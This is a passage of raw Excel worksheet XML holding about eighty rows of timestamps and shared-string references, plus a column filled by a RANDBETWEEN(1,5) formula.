        <v>43442.555798611109</v>
      </c>
      <c r="C6169" t="s">
        <v>41</v>
      </c>
      <c r="E6169" t="s">
        <v>5535</v>
      </c>
      <c r="F6169">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6170" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6170" s="1">
        <v>43442.472870370373</v>
      </c>
      <c r="C6170" t="s">
        <v>48</v>
      </c>
      <c r="E6170" t="s">
        <v>5536</v>
      </c>
      <c r="F6170">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6171" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6171" s="1">
        <v>43442.372037037036</v>
      </c>
      <c r="C6171" t="s">
        <v>10</v>
      </c>
      <c r="D6171" t="s">
        <v>89</v>
      </c>
      <c r="E6171" t="s">
        <v>5537</v>
      </c>
      <c r="F6171">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6172" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6172" s="1">
        <v>43442.372025462966</v>
      </c>
      <c r="C6172" t="s">
        <v>10</v>
      </c>
      <c r="D6172" t="s">
        <v>89</v>
      </c>
      <c r="E6172" t="s">
        <v>5537</v>
      </c>
      <c r="F6172">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6173" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A6173" s="1">
        <v>43442.34002314815</v>
      </c>
      <c r="C6173" t="s">
        <v>140</v>
      </c>
      <c r="D6173" t="s">
        <v>847</v>
      </c>
      <c r="E6173" s="2" t="s">
        <v>5538</v>
      </c>
      <c r="F6173">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6174" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6174" s="1">
        <v>43442.270937499998</v>
      </c>
      <c r="C6174" t="s">
        <v>253</v>
      </c>
      <c r="E6174" t="s">
        <v>5539</v>
      </c>
      <c r="F6174">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6175" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6175" s="1">
        <v>43442.237638888888</v>
      </c>
      <c r="C6175" t="s">
        <v>318</v>
      </c>
      <c r="F6175">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6176" s="1">
        <v>43442.237615740742</v>
      </c>
      <c r="C6176" t="s">
        <v>318</v>
      </c>
      <c r="F6176">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6177" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6177" s="1">
        <v>43442.237592592595</v>
      </c>
      <c r="C6177" t="s">
        <v>318</v>
      </c>
      <c r="F6177">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6178" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6178" s="1">
        <v>43442.237581018519</v>
      </c>
      <c r="C6178" t="s">
        <v>318</v>
      </c>
      <c r="F6178">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6179" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6179" s="1">
        <v>43442.237557870372</v>
      </c>
      <c r="C6179" t="s">
        <v>318</v>
      </c>
      <c r="F6179">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6180" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6180" s="1">
        <v>43442.236990740741</v>
      </c>
      <c r="C6180" t="s">
        <v>318</v>
      </c>
      <c r="F6180">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6181" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6181" s="1">
        <v>43442.218912037039</v>
      </c>
      <c r="C6181" t="s">
        <v>166</v>
      </c>
      <c r="E6181" s="2" t="s">
        <v>5540</v>
      </c>
      <c r="F6181">
        <f t="shared" ca="1" si="96"/>
        <v>4</v>
      </c>
    </row>
    <row r="6182" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6182" s="1">
        <v>43442.149363425924</v>
      </c>
      <c r="C6182" t="s">
        <v>41</v>
      </c>
      <c r="E6182" t="s">
        <v>2379</v>
      </c>
      <c r="F6182">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6183" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6183" s="1">
        <v>43442.147766203707</v>
      </c>
      <c r="C6183" t="s">
        <v>2108</v>
      </c>
      <c r="E6183">
        <v>2838</v>
      </c>
      <c r="F6183">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6184" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6184" s="1">
        <v>43442.113206018519</v>
      </c>
      <c r="C6184" t="s">
        <v>41</v>
      </c>
      <c r="E6184" t="s">
        <v>5541</v>
      </c>
      <c r="F6184">
        <f t="shared" ca="1" si="96"/>
        <v>4</v>
      </c>
    </row>
    <row r="6185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6185" s="1">
        <v>43442.106793981482</v>
      </c>
      <c r="C6185" t="s">
        <v>10</v>
      </c>
      <c r="D6185" t="s">
        <v>36</v>
      </c>
      <c r="E6185" t="s">
        <v>5542</v>
      </c>
      <c r="F6185">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6186" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6186" s="1">
        <v>43442.093726851854</v>
      </c>
      <c r="C6186" t="s">
        <v>817</v>
      </c>
      <c r="D6186" t="s">
        <v>632</v>
      </c>
      <c r="E6186" t="s">
        <v>4359</v>
      </c>
      <c r="F6186">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6187" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6187" s="1">
        <v>43442.003333333334</v>
      </c>
      <c r="C6187" t="s">
        <v>29</v>
      </c>
      <c r="E6187" t="s">
        <v>5543</v>
      </c>
      <c r="F6187">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6188" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6188" s="1">
        <v>43441.775763888887</v>
      </c>
      <c r="C6188" t="s">
        <v>10</v>
      </c>
      <c r="D6188" t="s">
        <v>36</v>
      </c>
      <c r="E6188" t="s">
        <v>5544</v>
      </c>
      <c r="F6188">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6189" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6189" s="1">
        <v>43441.75545138889</v>
      </c>
      <c r="C6189" t="s">
        <v>10</v>
      </c>
      <c r="D6189" t="s">
        <v>89</v>
      </c>
      <c r="E6189" t="s">
        <v>5545</v>
      </c>
      <c r="F6189">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6190" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6190" s="1">
        <v>43441.705972222226</v>
      </c>
      <c r="C6190" t="s">
        <v>10</v>
      </c>
      <c r="D6190" t="s">
        <v>158</v>
      </c>
      <c r="E6190" t="s">
        <v>5546</v>
      </c>
      <c r="F6190">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6191" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6191" s="1">
        <v>43441.661215277774</v>
      </c>
      <c r="C6191" t="s">
        <v>10</v>
      </c>
      <c r="D6191" t="s">
        <v>52</v>
      </c>
      <c r="E6191" s="2" t="s">
        <v>5547</v>
      </c>
      <c r="F6191">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6192" s="1">
        <v>43441.640393518515</v>
      </c>
      <c r="C6192" t="s">
        <v>1381</v>
      </c>
      <c r="E6192" t="s">
        <v>5548</v>
      </c>
      <c r="F6192">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6193" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6193" s="1">
        <v>43441.635613425926</v>
      </c>
      <c r="C6193" t="s">
        <v>10</v>
      </c>
      <c r="D6193" t="s">
        <v>89</v>
      </c>
      <c r="E6193" t="s">
        <v>5549</v>
      </c>
      <c r="F6193">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6194" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6194" s="1">
        <v>43441.612002314818</v>
      </c>
      <c r="C6194" t="s">
        <v>10</v>
      </c>
      <c r="D6194" t="s">
        <v>112</v>
      </c>
      <c r="E6194" s="2" t="s">
        <v>5550</v>
      </c>
      <c r="F6194">
        <f t="shared" ca="1" si="96"/>
        <v>4</v>
      </c>
    </row>
    <row r="6195" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6195" s="1">
        <v>43441.60428240741</v>
      </c>
      <c r="C6195" t="s">
        <v>10</v>
      </c>
      <c r="D6195" t="s">
        <v>36</v>
      </c>
      <c r="E6195" s="2" t="s">
        <v>5551</v>
      </c>
      <c r="F6195">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6196" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6196" s="1">
        <v>43441.602546296293</v>
      </c>
      <c r="C6196" t="s">
        <v>6</v>
      </c>
      <c r="D6196" t="s">
        <v>821</v>
      </c>
      <c r="E6196" t="s">
        <v>5552</v>
      </c>
      <c r="F6196">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6197" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6197" s="1">
        <v>43441.546747685185</v>
      </c>
      <c r="C6197" t="s">
        <v>10</v>
      </c>
      <c r="D6197" t="s">
        <v>178</v>
      </c>
      <c r="E6197" s="2" t="s">
        <v>5553</v>
      </c>
      <c r="F6197">
        <f t="shared" ca="1" si="96"/>
        <v>4</v>
      </c>
    </row>
    <row r="6198" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6198" s="1">
        <v>43441.534861111111</v>
      </c>
      <c r="C6198" t="s">
        <v>10</v>
      </c>
      <c r="D6198" t="s">
        <v>33</v>
      </c>
      <c r="F6198">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6199" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6199" s="1">
        <v>43441.511724537035</v>
      </c>
      <c r="C6199" t="s">
        <v>10</v>
      </c>
      <c r="D6199" t="s">
        <v>36</v>
      </c>
      <c r="E6199" t="s">
        <v>5554</v>
      </c>
      <c r="F6199">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6200" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6200" s="1">
        <v>43441.509710648148</v>
      </c>
      <c r="C6200" t="s">
        <v>43</v>
      </c>
      <c r="E6200" s="2" t="s">
        <v>5555</v>
      </c>
      <c r="F6200">
        <f t="shared" ca="1" si="96"/>
        <v>4</v>
      </c>
    </row>
    <row r="6201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6201" s="1">
        <v>43441.507141203707</v>
      </c>
      <c r="C6201" t="s">
        <v>10</v>
      </c>
      <c r="D6201" t="s">
        <v>46</v>
      </c>
      <c r="E6201" t="s">
        <v>5556</v>
      </c>
      <c r="F6201">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6202" s="1">
        <v>43441.50508101852</v>
      </c>
      <c r="C6202" t="s">
        <v>10</v>
      </c>
      <c r="D6202" t="s">
        <v>17</v>
      </c>
      <c r="E6202" t="s">
        <v>5557</v>
      </c>
      <c r="F6202">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6203" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6203" s="1">
        <v>43441.500752314816</v>
      </c>
      <c r="C6203" t="s">
        <v>10</v>
      </c>
      <c r="D6203" t="s">
        <v>263</v>
      </c>
      <c r="E6203" t="s">
        <v>5558</v>
      </c>
      <c r="F6203">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6204" s="1">
        <v>43441.472384259258</v>
      </c>
      <c r="C6204" t="s">
        <v>41</v>
      </c>
      <c r="E6204" t="s">
        <v>5559</v>
      </c>
      <c r="F6204">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6205" s="1">
        <v>43441.470185185186</v>
      </c>
      <c r="C6205" t="s">
        <v>10</v>
      </c>
      <c r="D6205" t="s">
        <v>721</v>
      </c>
      <c r="E6205" t="s">
        <v>5560</v>
      </c>
      <c r="F6205">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6206" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6206" s="1">
        <v>43441.453923611109</v>
      </c>
      <c r="C6206" t="s">
        <v>6</v>
      </c>
      <c r="D6206" t="s">
        <v>25</v>
      </c>
      <c r="E6206" s="2" t="s">
        <v>5561</v>
      </c>
      <c r="F6206">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6207" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6207" s="1">
        <v>43441.452638888892</v>
      </c>
      <c r="C6207" t="s">
        <v>10</v>
      </c>
      <c r="D6207" t="s">
        <v>23</v>
      </c>
      <c r="E6207" t="s">
        <v>5562</v>
      </c>
      <c r="F6207">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6208" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6208" s="1">
        <v>43441.450601851851</v>
      </c>
      <c r="C6208" t="s">
        <v>6</v>
      </c>
      <c r="D6208" t="s">
        <v>25</v>
      </c>
      <c r="E6208" s="2" t="s">
        <v>5563</v>
      </c>
      <c r="F6208">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6209" s="1">
        <v>43441.438738425924</v>
      </c>
      <c r="C6209" t="s">
        <v>10</v>
      </c>
      <c r="D6209" t="s">
        <v>336</v>
      </c>
      <c r="E6209" t="s">
        <v>5564</v>
      </c>
      <c r="F6209">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6210" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6210" s="1">
        <v>43441.433333333334</v>
      </c>
      <c r="C6210" t="s">
        <v>10</v>
      </c>
      <c r="D6210" t="s">
        <v>52</v>
      </c>
      <c r="E6210" t="s">
        <v>5565</v>
      </c>
      <c r="F6210">
        <f t="shared" ref="F6210:F6273" ca="1" si="97">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="6211" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6211" s="1">
        <v>43441.425763888888</v>
      </c>
      <c r="C6211" t="s">
        <v>10</v>
      </c>
      <c r="D6211" t="s">
        <v>263</v>
      </c>
      <c r="E6211" t="s">
        <v>5566</v>
      </c>
      <c r="F6211">
        <f t="shared" ca="1" si="97"/>
        <v>2</v>
      </c>
    </row>
    <row r="6212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6212" s="1">
        <v>43441.400729166664</v>
      </c>
      <c r="C6212" t="s">
        <v>734</v>
      </c>
      <c r="D6212" t="s">
        <v>124</v>
      </c>
      <c r="E6212" t="s">
        <v>3973</v>
      </c>
      <c r="F6212">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6213" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6213" s="1">
        <v>43441.393680555557</v>
      </c>
      <c r="C6213" t="s">
        <v>559</v>
      </c>
      <c r="E6213" s="2" t="s">
        <v>5567</v>
      </c>
      <c r="F6213">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6214" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6214" s="1">
        <v>43441.386018518519</v>
      </c>
      <c r="C6214" t="s">
        <v>559</v>
      </c>
      <c r="D6214" t="s">
        <v>312</v>
      </c>
      <c r="E6214" s="2" t="s">
        <v>5568</v>
      </c>
      <c r="F6214">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6215" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6215" s="1">
        <v>43441.337199074071</v>
      </c>
      <c r="C6215" t="s">
        <v>48</v>
      </c>
      <c r="E6215" t="s">
        <v>5569</v>
      </c>
      <c r="F6215">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6216" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6216" s="1">
        <v>43441.335798611108</v>
      </c>
      <c r="C6216" t="s">
        <v>2108</v>
      </c>
      <c r="E6216" t="s">
        <v>828</v>
      </c>
      <c r="F6216">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6217" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6217" s="1">
        <v>43441.32471064815</v>
      </c>
      <c r="C6217" t="s">
        <v>10</v>
      </c>
      <c r="D6217" t="s">
        <v>244</v>
      </c>
      <c r="E6217" s="2" t="s">
        <v>5570</v>
      </c>
      <c r="F6217">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6218" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6218" s="1">
        <v>43441.321875000001</v>
      </c>
      <c r="C6218" t="s">
        <v>48</v>
      </c>
      <c r="E6218" t="s">
        <v>5571</v>
      </c>
      <c r="F6218">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6219" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6219" s="1">
        <v>43441.252002314817</v>
      </c>
      <c r="C6219" t="s">
        <v>140</v>
      </c>
      <c r="D6219" t="s">
        <v>141</v>
      </c>
      <c r="F6219">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6220" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6220" s="1">
        <v>43441.219247685185</v>
      </c>
      <c r="C6220" t="s">
        <v>41</v>
      </c>
      <c r="E6220" t="s">
        <v>5572</v>
      </c>
      <c r="F6220">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6221" s="1">
        <v>43441.168900462966</v>
      </c>
      <c r="C6221" t="s">
        <v>3443</v>
      </c>
      <c r="E6221" t="s">
        <v>5573</v>
      </c>
      <c r="F6221">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6222" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6222" s="1">
        <v>43441.137696759259</v>
      </c>
      <c r="C6222" t="s">
        <v>10</v>
      </c>
      <c r="D6222" t="s">
        <v>6</v>
      </c>
      <c r="F6222">
        <f t="shared" ca="1" si="97"/>
        <v>2</v>
      </c>
    </row>
    <row r="6223" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6223" s="1">
        <v>43441.069594907407</v>
      </c>
      <c r="C6223" t="s">
        <v>41</v>
      </c>
      <c r="F6223">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6224" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A6224" s="1">
        <v>43441.041041666664</v>
      </c>
      <c r="C6224" t="s">
        <v>10</v>
      </c>
      <c r="D6224" t="s">
        <v>229</v>
      </c>
      <c r="E6224" s="2" t="s">
        <v>5574</v>
      </c>
      <c r="F6224">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6225" s="1">
        <v>43440.69054398148</v>
      </c>
      <c r="C6225" t="s">
        <v>10</v>
      </c>
      <c r="D6225" t="s">
        <v>17</v>
      </c>
      <c r="E6225" t="s">
        <v>5575</v>
      </c>
      <c r="F6225">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6226" s="1">
        <v>43440.667430555557</v>
      </c>
      <c r="C6226" t="s">
        <v>10</v>
      </c>
      <c r="D6226" t="s">
        <v>192</v>
      </c>
      <c r="E6226" t="s">
        <v>5576</v>
      </c>
      <c r="F6226">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6227" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6227" s="1">
        <v>43440.661041666666</v>
      </c>
      <c r="C6227" t="s">
        <v>50</v>
      </c>
      <c r="E6227" s="2" t="s">
        <v>5577</v>
      </c>
      <c r="F6227">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6228" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6228" s="1">
        <v>43440.630474537036</v>
      </c>
      <c r="C6228" t="s">
        <v>10</v>
      </c>
      <c r="D6228" t="s">
        <v>271</v>
      </c>
      <c r="E6228" t="s">
        <v>5578</v>
      </c>
      <c r="F6228">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6229" s="1">
        <v>43440.614317129628</v>
      </c>
      <c r="C6229" t="s">
        <v>10</v>
      </c>
      <c r="D6229" t="s">
        <v>33</v>
      </c>
      <c r="F6229">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6230" s="1">
        <v>43440.614201388889</v>
      </c>
      <c r="C6230" t="s">
        <v>10</v>
      </c>
      <c r="D6230" t="s">
        <v>33</v>
      </c>
      <c r="F6230">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6231" s="1">
        <v>43440.61346064815</v>
      </c>
      <c r="C6231" t="s">
        <v>10</v>
      </c>
      <c r="D6231" t="s">
        <v>17</v>
      </c>
      <c r="E6231" t="s">
        <v>5579</v>
      </c>
      <c r="F6231">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6232" s="1">
        <v>43440.61341435185</v>
      </c>
      <c r="C6232" t="s">
        <v>10</v>
      </c>
      <c r="D6232" t="s">
        <v>17</v>
      </c>
      <c r="E6232" t="s">
        <v>5579</v>
      </c>
      <c r="F6232">
        <f t="shared" ca="1" si="97"/>
        <v>2</v>
      </c>
    </row>
    <row r="6233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6233" s="1">
        <v>43440.599803240744</v>
      </c>
      <c r="B6233" t="s">
        <v>35</v>
      </c>
      <c r="C6233" t="s">
        <v>6</v>
      </c>
      <c r="D6233" t="s">
        <v>25</v>
      </c>
      <c r="E6233" t="s">
        <v>5580</v>
      </c>
      <c r="F6233">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6234" s="1">
        <v>43440.59815972222</v>
      </c>
      <c r="B6234" t="s">
        <v>19</v>
      </c>
      <c r="C6234" t="s">
        <v>6</v>
      </c>
      <c r="D6234" t="s">
        <v>25</v>
      </c>
      <c r="E6234" t="s">
        <v>5580</v>
      </c>
      <c r="F6234">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6235" s="1">
        <v>43440.59474537037</v>
      </c>
      <c r="C6235" t="s">
        <v>10</v>
      </c>
      <c r="D6235" t="s">
        <v>23</v>
      </c>
      <c r="E6235" t="s">
        <v>5581</v>
      </c>
      <c r="F6235">
        <f t="shared" ca="1" si="97"/>
        <v>2</v>
      </c>
    </row>
    <row r="6236" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6236" s="1">
        <v>43440.583912037036</v>
      </c>
      <c r="C6236" t="s">
        <v>10</v>
      </c>
      <c r="D6236" t="s">
        <v>80</v>
      </c>
      <c r="E6236" s="2" t="s">
        <v>5582</v>
      </c>
      <c r="F6236">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6237" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6237" s="1">
        <v>43440.563587962963</v>
      </c>
      <c r="C6237" t="s">
        <v>10</v>
      </c>
      <c r="D6237" t="s">
        <v>263</v>
      </c>
      <c r="E6237" t="s">
        <v>5583</v>
      </c>
      <c r="F6237">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6238" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6238" s="1">
        <v>43440.556898148148</v>
      </c>
      <c r="B6238" t="s">
        <v>5</v>
      </c>
      <c r="C6238" t="s">
        <v>6</v>
      </c>
      <c r="D6238" t="s">
        <v>25</v>
      </c>
      <c r="E6238" t="s">
        <v>5584</v>
      </c>
      <c r="F6238">
        <f t="shared" ca="1" si="97"/>
        <v>5</v>
      </c>
    </row>
    <row r="6239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6239" s="1">
        <v>43440.55673611111</v>
      </c>
      <c r="B6239" t="s">
        <v>13</v>
      </c>
      <c r="C6239" t="s">
        <v>6</v>
      </c>
      <c r="D6239" t="s">
        <v>25</v>
      </c>
      <c r="E6239" t="s">
        <v>5584</v>
      </c>
      <c r="F6239">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6240" s="1">
        <v>43440.555706018517</v>
      </c>
      <c r="B6240" t="s">
        <v>1305</v>
      </c>
      <c r="C6240" t="s">
        <v>6</v>
      </c>
      <c r="D6240" t="s">
        <v>25</v>
      </c>
      <c r="E6240" t="s">
        <v>5585</v>
      </c>
      <c r="F6240">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6241" s="1">
        <v>43440.555138888885</v>
      </c>
      <c r="B6241" t="s">
        <v>19</v>
      </c>
      <c r="C6241" t="s">
        <v>6</v>
      </c>
      <c r="D6241" t="s">
        <v>25</v>
      </c>
      <c r="E6241" t="s">
        <v>5580</v>
      </c>
      <c r="F6241">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6242" s="1">
        <v>43440.554849537039</v>
      </c>
      <c r="B6242" t="s">
        <v>35</v>
      </c>
      <c r="C6242" t="s">
        <v>6</v>
      </c>
      <c r="D6242" t="s">
        <v>25</v>
      </c>
      <c r="E6242" t="s">
        <v>5580</v>
      </c>
      <c r="F6242">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6243" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6243" s="1">
        <v>43440.550196759257</v>
      </c>
      <c r="C6243" t="s">
        <v>60</v>
      </c>
      <c r="D6243" t="s">
        <v>312</v>
      </c>
      <c r="E6243" t="s">
        <v>5586</v>
      </c>
      <c r="F6243">
        <f t="shared" ca="1" si="97"/>
        <v>3</v>
      </c>
    </row>
    <row r="6244" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6244" s="1">
        <v>43440.528067129628</v>
      </c>
      <c r="C6244" t="s">
        <v>6</v>
      </c>
      <c r="D6244" t="s">
        <v>25</v>
      </c>
      <c r="E6244" t="s">
        <v>5587</v>
      </c>
      <c r="F6244">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6245" s="1">
        <v>43440.516736111109</v>
      </c>
      <c r="C6245" t="s">
        <v>10</v>
      </c>
      <c r="D6245" t="s">
        <v>33</v>
      </c>
      <c r="F6245">
        <f t="shared" ca="1" si="97"/>
        <v>4</v>
      </c>
    </row>
    <row r="6246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6246" s="1">
        <v>43440.515810185185</v>
      </c>
      <c r="C6246" t="s">
        <v>10</v>
      </c>
      <c r="E6246" t="s">
        <v>5588</v>
      </c>
      <c r="F6246">
        <f t="shared" ca="1" si="97"/>
        <v>1</v>
      </c>
    </row>
    <row r="6247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6247" s="1">
        <v>43440.51462962963</v>
      </c>
      <c r="C6247" t="s">
        <v>10</v>
      </c>
      <c r="D6247" t="s">
        <v>374</v>
      </c>
      <c r="E6247" t="s">
        <v>5589</v>
      </c>
      <c r="F6247">
        <f t="shared" ca="1" si="97"/>
        <v>2</v>
      </c>
    </row>
    <row r="6248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6248" s="1">
        <v>43440.502199074072</v>
      </c>
